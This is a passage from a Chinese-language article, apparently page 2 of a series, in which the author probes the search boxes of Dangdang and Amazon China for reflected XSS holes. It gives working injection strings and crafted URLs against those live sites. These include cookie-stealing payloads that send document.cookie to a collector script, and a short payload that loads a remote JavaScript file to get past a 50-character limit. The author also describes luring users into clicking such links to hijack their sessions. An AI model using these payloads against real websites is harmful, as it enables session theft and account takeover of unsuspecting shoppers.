2.当当
国内做得最好的2家B2C电子商务平台之一(我的技术书籍很多是从那里买的^_^)
当当首页只有一个搜索框,如图:
图 6 当当首页
尝试了几次特殊字符的输入,发现了一个XSS漏洞,于是构造一下语句尝试弹出一个XSS对话框:
以下是引用片段:
);};catch(e){;}try{alert("XSSK |
结果成功,如图:
图 7 当当的弹出框
于是尝试构造获取无辜用户cookie的url如下:
以下是引用片段:
http://search.dangdang.com/search.aspx?key=");};catch(e){;}try{document.write('<img src="http://127.0.0.1/ted.php?cookie='+escape(document.cookie)+'">');alert("&selbook=0&selmusic=0&selmovie=0&key1=&key2=&key3=&key4=&key5=&catalog=&SearchFromTop=2 |
但是发现被截断了,有长度限制。测试了一下,长度限制为50。当当网的XSS漏洞探测我只做到这里,因为我会在亚马逊中国(前身是卓越网)中演示怎么规避长度限制的。
3.亚马逊中国作为和当当并列的国内2大B2C电子商务平台,说实话,我以前整天看到卓越网的广告,但是倒没有到那里买过东西。我在探测亚马逊中国之前猜想这个网站应该会比淘宝和当当的安全性好吧!毕竟是被亚马逊等国外B2C电子商务平台的霸王收购了,总得有点技术支持吧。
但是我猜错了,亚马逊中国是我在国内几大电子商务企业的XSS渗透中发现做得最烂的。输入以下测试字符:
''!--<XSS>&{()}
发现根本没有做任何转义过滤。如图
图 8 亚马逊中国的页面源代码
居然任何过滤的没有,太让我失望了。
还是老步骤,先构造一个弹出XSS的对话框玩玩。
代码如下:
以下是引用片段:
"/><script>alert('XSS');</script><input " |
超链接如下:
以下是引用片段:
http://www.amazon.cn/mn/searchApp?ix=sunray&pageletid=headsearch&searchType=&keywords="/><script>alert('XSS');</script><input "&searchKind=keyword&bestSaleNum=3 |
构造成功,如图:
图 9 亚马逊的弹出框
再下一步就是构造窃取用户cookie的链接了,我的第一次尝试如下:
以下是引用片段:
http://www.amazon.cn/mn/searchApp?ix=sunray&pageletid=headsearch&searchType=&keywords="/><script>var a='<img src="http://127.0.0.1/ted.php?cookie=';a%2B=escape (document.cookie);a%2B='">';document.write(a);</script><input "&searchKind=keyword&bestSaleNum=3 |
但是发现失败,原来有长度限制,经过在输入框逐渐增加1234567890的字符输入测试,发现长度限制为50.
但是50的长度已经足够构造一个调用远程js脚本的XSS语句了。如下:
以下是引用片段:
http://www.amazon.cn/mn/searchApp?ix=sunray&pageletid=headsearch&searchType=&keywords="/><script src="http://127.0.0.1/s.js"></script><input "&searchKind=keyword&bestSaleNum=3 |
呵呵,当然是成功了
这个XSS Attacker就可以和我之前讲述淘宝时候的方法来欺骗亚马逊中国的用户点击他的链接,获取无辜用户的cookie,然后以无辜用户的权限胡作非为了。
上一页 [1] [2] [3] 下一页
[组图]搜索框所引起的XSS漏洞
您现在的位置: